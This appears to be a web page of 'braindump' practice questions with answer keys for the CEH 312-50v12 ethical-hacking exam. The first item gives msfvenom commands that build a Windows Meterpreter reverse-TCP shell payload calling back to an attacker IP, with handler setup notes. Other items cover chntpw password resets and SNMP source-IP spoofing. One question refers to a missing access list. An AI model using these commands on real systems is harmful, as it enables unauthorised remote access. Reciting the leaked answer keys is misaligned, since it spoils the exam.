Free 312-50v12 Exam Braindumps

- (Exam Topic 2)
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

1. A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
2. B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
3. C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
4. D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Correct Answer: C
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST<=Your IP Address> LPORT= -f exe > shell.exe

- (Exam Topic 1)
You have gained physical access to a Windows 2008 R2 server which has an accessible disc drive. When you attempt to boot the server and log in, you are unable to guess the password. In your toolkit, you have an Ubuntu 9.10 Linux LiveCD. Which Linux-based tool can change any user’s password or activate disabled Windows accounts?

1. A. John the Ripper
2. B. SET
3. C. CHNTPW
4. D. Cain & Abel

Correct Answer: C

- (Exam Topic 1)
Which of the following statements about a zone transfer is correct? (Choose three.)

1. A. A zone transfer is accomplished with the DNS
2. B. A zone transfer is accomplished with the nslookup service
3. C. A zone transfer passes all zone information that a DNS server maintains
4. D. A zone transfer passes all zone information that a nslookup server maintains
5. E. A zone transfer can be prevented by blocking all inbound TCP port 53 connections
6. F. Zone transfers cannot occur on the Internet

Correct Answer: ACE

- (Exam Topic 2)
The network administrator at Spears Technology, Inc has configured the default gateway Cisco router's access-list as below:
You are hired to conduct security testing on their network.
You successfully brute-force the SNMP community string using a SNMP crack tool.
The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco configuration from the router. How would you proceed?

1. A. Use the Cisco's TFTP default password to connect and download the configuration file
2. B. Run a network sniffer and capture the returned traffic with the configuration file from the router
3. C. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address
4. D. Send a customized SNMP set request with a spoofed source IP address in the range -192.168.1.0

Correct Answer: BD

- (Exam Topic 1)
Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored?

1. A. symmetric algorithms
2. B. asymmetric algorithms
3. C. hashing algorithms
4. D. integrity algorithms

Correct Answer: C